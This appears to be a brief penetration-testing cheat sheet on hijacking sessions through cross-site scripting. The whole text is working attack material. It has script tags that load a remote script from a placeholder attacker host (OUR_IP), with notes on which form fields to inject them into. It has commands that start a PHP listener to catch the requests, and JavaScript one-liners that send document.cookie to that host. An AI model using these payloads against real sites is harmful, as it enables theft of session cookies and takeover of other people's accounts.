Session Hijacking
Loading a Remote Script
<script src="http://OUR_IP/script.js"></script>mkdir /tmp/tmpserver
cd /tmp/tmpserver
sudo php -S 0.0.0.0:80<script src=http://OUR_IP/fullname></script> #this goes inside the full-name field
<script src=http://OUR_IP/username></script> #this goes inside the username fieldSession Hijacking
document.location='http://OUR_IP/index.php?c='+document.cookie;
new Image().src='http://OUR_IP/index.php?c='+document.cookie;Last updated